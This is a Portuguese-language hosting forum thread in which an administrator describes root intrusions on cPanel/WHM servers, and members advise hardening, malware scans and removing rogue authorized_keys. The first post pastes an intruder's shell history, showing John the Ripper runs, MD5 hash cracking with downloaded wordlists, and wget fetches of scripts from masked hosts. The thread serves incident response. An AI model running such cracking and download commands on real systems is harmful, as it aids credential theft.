Página 1 de 2 12 ÚltimoÚltimo
Resultados 1 a 10 de 12
  1. #1
    Louco pelo WHT Brasil
    Data de Ingresso
    Feb 2014
    Posts
    166

    Question Acesso Root pelo SSH/WHM

    Olá Pessoal,

    Nos ultimos dias venho sofrendo invasão pelo WHM e SSH (quando habilitado), nos meus servidores (80%) linux com WHM.

    Inicialmente me parece que as credenciais vazaram, assim que comecei a receber os alertas de acesso, prontamente mudei a senha e derrubei o invasor e mesmo assim em um ocasião com a senha mudada a poucos minutos houve acesso novamente, mas emails antigos que estavam indo para lixeira mostravam que isso já vinha a algum tempo ocorrendo. Analisei a segurança do server e fiz todas as atualizações que poderiam ser a causa, mas mesmo tendo tudo atualizado e com CSF e CPHulk os acessos continuaram. Verifiquei que em alguns desses servidores, foram acessados a partir de outros que já tinham sido acessados pelo mesmo invasor.

    Aparentemente analisando o .bash_history e outros logs como do lfd de um ou outro server a unica coisa que foi feita a instalação do PPTP que é uma VPN for linux em um servidor e em outro encontrei isto abaixo, mas não é recente e já tinha removido ha algum tempo:
    Código:
    cat .bash_history
    pwd
    mkdir 0
    cd 0
    cat password.lst
    touch md5
    pico md5
    ll
    rm -r md5
    touch md5
    pico md5
    john --wordlist=password.lst md5
    ./john --wordlist=password.lst md5
    pico md5
    ./john --wordlist=password.lst md5
    chmod 777 md5
    ./john --wordlist=password.lst md5
    cat md5
    ll
    ./john --format=raw-md5 md5
    mv md5 lol.txt
    ll
    cat john.log
    touch lol
    pico lol
    cat lol
    ./john --format=raw-md5 lol
    ./john --format=md5 lol
    ./john 
    ./john --format=md5crypt lol
    ./john --format=descrypt lol
    cat lol
    chmod 777 lol
    ./john --format=descrypt lol
    ./john --format=md5crypt lol
    wget XXXXX//4.py
    python 4.py cdc83dda77b9fccb4a26bddaf1e564a5
    python 4.py --online cdc83dda77b9fccb4a26bddaf1e564a5
    chmod 777 4.py
    ./4.py
    pwd
    wget XXXXX/hashlib-20081119.zip?attredirects=0
    ll
    wget XXXX/hashlib/hashlib-20081119.zip
    ls -lq
    wget XXXXX/hashlib/hashlib-20081119.zip
    wget -O lol.zip XXXXX/hashlib/hashlib-20081119.zip
    wget -O lol.zipXXXXX//hashlib/hashlib-20081119.zip
    unzip lol.zip
    ll
    cd lol
    cd hashlib-20081119
    python setup.py install
    cd ..
    pwd
    ll
    chmod 777 4.py
    ./4.py
    ./4.py --online cdc83dda77b9fccb4a26bddaf1e564a5
    ./4.py --online 704b12c48f0d2f72ad37657909564e16
    ./4.py --online 86427c231f9e9f50241cb371b832ec71
    ./4.py --online c92103e664431dbc209e524dc6bd0811
    ./4.py --online b260ca94eff470efc8e45956ddd3f82f
    touch me
    pico me
    ./4.py --offline b260ca94eff470efc8e45956ddd3f82f me
    wget XXXXX//pass.txt
    ./4.py --offline b260ca94eff470efc8e45956ddd3f82f pass.txt
    ./4.py --offline cdc83dda77b9fccb4a26bddaf1e564a5 pass.txt
    ./4.py --offline 704b12c48f0d2f72ad37657909564e16 pass.txt
    mkdir 1
    cd 1
    wget XXXXX//wp_uploads/slo_eng_alnum_big.lst.zip
    unzip slo_eng_alnum_big.lst.zip
    ll
    cd ..
    ./4.py --offline cdc83dda77b9fccb4a26bddaf1e564a5 1/slo_eng_big.lst
    ./4.py --offline 704b12c48f0d2f72ad37657909564e16 1/slo_eng_big.lst
    ./4.py --offline 86427c231f9e9f50241cb371b832ec71 1/slo_eng_big.lst
    ./4.py --offline c92103e664431dbc209e524dc6bd0811 1/slo_eng_big.lst
    ./4.py --offline 86427c231f9e9f50241cb371b832ec714 1/slo_eng_big.lst
    ./4.py --offline 704b12c48f0d2f72ad37657909564e163 1/slo_eng_big.lst
    ./4.py --offline cdc83dda77b9fccb4a26bddaf1e564a52 1/slo_eng_big.lst
    XXXXX//1652205519/WPA-PSK+WORDLIST+3+Final+%2813+GB%29+rar
    wget XXXXX//1652205519/WPA-PSK+WORDLIST+3+Final+%2813+GB%29+rar
    wget -O lol.rar "XXXXX//download/1652205519/WPA-PSK+WORDLIST+3+Final+%2813+GB%29+rar"
    wget -O lol.rar 'XXXXX/download/1652205519/WPA-PSK+WORDLIST+3+Final+%2813+GB%29+rar'
    wget XXXXX//passwords/john.txt.bz2
    bzip2 -d john.txt.bz2
    ll
    pwd
    cd 1
    ll
    wget XXXXX//passwords/john.txt.bz2
    ll
    bzip -d john.txt.bz2
    bzi
    bzip
    bzip2
    bzip2 -d john.txt.bz2
    ll
    chmod 777 john.txt
    cd ..
    chmod -R 777 1
    ./4.py --offline cdc83dda77b9fccb4a26bddaf1e564a52 1/john.txt
    cat 1/john.txt
    ./4.py --offline 704b12c48f0d2f72ad37657909564e163 1/john.txt
    cd 1
    wget XXXXX//passwords/cain.txt.bz2
    bzip2 -d cain.txt.bz2
    cd ..
    chmod -R 777 1
    ./4.py --offline 704b12c48f0d2f72ad37657909564e163 1/cain.txt
    ./4.py --offline cdc83dda77b9fccb4a26bddaf1e564a52 1/cain.txt
    ./4.py --offline 86427c231f9e9f50241cb371b832ec714 1/cain.txt
    ./4.py --offline c92103e664431dbc209e524dc6bd0811 1/cain.txt
    cd 1
    wget XXXXX//PsycO/PsycOPacKv2.rar
    exit
    Ontem foi uma seqüência de acessos ao WHM do mesmo IP (arabia saudita) e mesmo alterando a senha de um dos servidores mas na sequencia o cara acessou de novo. A unica forma de parar os acessos foi adicionar o range de IP dele no CPHulk e CSF. Em complemento usando o Host Access Control fechei o acesso aos serviços SSHD e WHM, deixando apenas meu IP allow.


    Agradeço, antecipadamente, a todos pelas mensagens enviadas.

  2. #2
    WHT-BR Top Member
    Data de Ingresso
    Nov 2010
    Posts
    1,611
    Nossa cara.

    Que terror :S

    Eu vi que você comentou que são servidores, dependendo do numero, eu recomendaria contratar um novo servidor, endurecer ele, colocar cxs, maldet, clamav, pyxsoft, regras atualizadas do mod security (deixar tudo com varredura em tempo real), só depois disso importar as contas dos servidores invadidos, certamente você vai ter uma *****da de conta infectada...

    Além de contas com virus, malwares, talvez você possa ter problemas com spam bots e phishing.

    Recomendaria que coloca-se isso em pratica em 3, 2, 1....

    Boa sorte
    oGigante.com*• Revenda de Hospedagem Cloud Linux + WHMCS Grátis
    VWhost.com.br • Revenda de Hospedagem Linux Cpanel + CloudFlare
    Zocka.com.br • Hospedagem de Sites Cpanel + Construtor de Sites

  3. #3
    Louco pelo WHT Brasil
    Data de Ingresso
    Feb 2014
    Posts
    166
    Citação Postado originalmente por chuvadenovembro Ver Post
    Nossa cara.

    Que terror :S

    Eu vi que você comentou que são servidores, dependendo do numero, eu recomendaria contratar um novo servidor, endurecer ele, colocar cxs, maldet, clamav, pyxsoft, regras atualizadas do mod security (deixar tudo com varredura em tempo real), só depois disso importar as contas dos servidores invadidos, certamente você vai ter uma *****da de conta infectada...

    Além de contas com virus, malwares, talvez você possa ter problemas com spam bots e phishing.

    Recomendaria que coloca-se isso em pratica em 3, 2, 1....

    Boa sorte
    Então um dos servidores tem cxs, mas em todos clamav e modsecurity, além do csf e cphulk já mencionado.

    Vou fazer uma varredura e vê aparece alguma coisa no radar.
    Valeu

  4. #4
    WHT-BR Top Member
    Data de Ingresso
    Nov 2010
    Posts
    1,611
    A proteção de open_basedir está habilitada? nesses servidores?
    oGigante.com*• Revenda de Hospedagem Cloud Linux + WHMCS Grátis
    VWhost.com.br • Revenda de Hospedagem Linux Cpanel + CloudFlare
    Zocka.com.br • Hospedagem de Sites Cpanel + Construtor de Sites

  5. #5
    Louco pelo WHT Brasil
    Data de Ingresso
    Feb 2014
    Posts
    166
    Citação Postado originalmente por chuvadenovembro Ver Post
    A proteção de open_basedir está habilitada? nesses servidores?
    Sim está habilitada !

  6. #6
    Quero ser Guru
    Data de Ingresso
    Feb 2013
    Localização
    Pomerode - SC
    Posts
    82
    Verifique se existe algum arquivo dentro da pasta .ssh do seu usário root. Pode ser que o hacker esteja utilizando isso para efetuar o acesso.

    Essa opção não precisa de senha.
    Hospedagem de Sites - Registro de Domínios - Lojas Virtuais - E-mail Marketing
    Twitter: @ddrhost -- Site: www.ddrhost.com.br

  7. #7
    Louco pelo WHT Brasil
    Data de Ingresso
    Feb 2014
    Posts
    166
    Citação Postado originalmente por ddrhost Ver Post
    Verifique se existe algum arquivo dentro da pasta .ssh do seu usário root. Pode ser que o hacker esteja utilizando isso para efetuar o acesso.

    Essa opção não precisa de senha.
    Sim tem dois arquivos: authorized_keys e authorized_keys2

    Salvo engano isso eu as limpei aqui: Home »Security Center »Manage root’s SSH Keys

    Então se tiver arquivos com as aqui nesta pasta os caras tem acesso ssh sem precisar de senha?

  8. #8
    Quero ser Guru
    Data de Ingresso
    Feb 2013
    Localização
    Pomerode - SC
    Posts
    82
    Correto. Remova esses arquivos.
    Hospedagem de Sites - Registro de Domínios - Lojas Virtuais - E-mail Marketing
    Twitter: @ddrhost -- Site: www.ddrhost.com.br

  9. #9
    WHT-BR Top Member
    Data de Ingresso
    Nov 2010
    Posts
    1,611
    Esse servidor que removeu esses authorized_keys é da OVH? teve uma ocasião que a senha gerada automaticamente pelo sistema deles ficou comprometido:

    http://www.webhostingtalk.com.br/for...801/#post21324
    oGigante.com*• Revenda de Hospedagem Cloud Linux + WHMCS Grátis
    VWhost.com.br • Revenda de Hospedagem Linux Cpanel + CloudFlare
    Zocka.com.br • Hospedagem de Sites Cpanel + Construtor de Sites

  10. #10
    Louco pelo WHT Brasil
    Data de Ingresso
    Feb 2014
    Posts
    166
    Citação Postado originalmente por chuvadenovembro Ver Post
    Esse servidor que removeu esses authorized_keys é da OVH? teve uma ocasião que a senha gerada automaticamente pelo sistema deles ficou comprometido:
    Não uso esse sistema.

    Encontrei em outros servidores rsa0.key e rsa1.key já removi todos eles.

    Então tendo essas chaves o acesso fica liberado ao servidor. Mas usando o Cphulk, CSF, APF ou Host Access Control ainda precede a essas chaves correto?

    Valeu isso já deu uma ideia de como foi o acesso. Falta agora saber como eles criaram essas chaves.

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •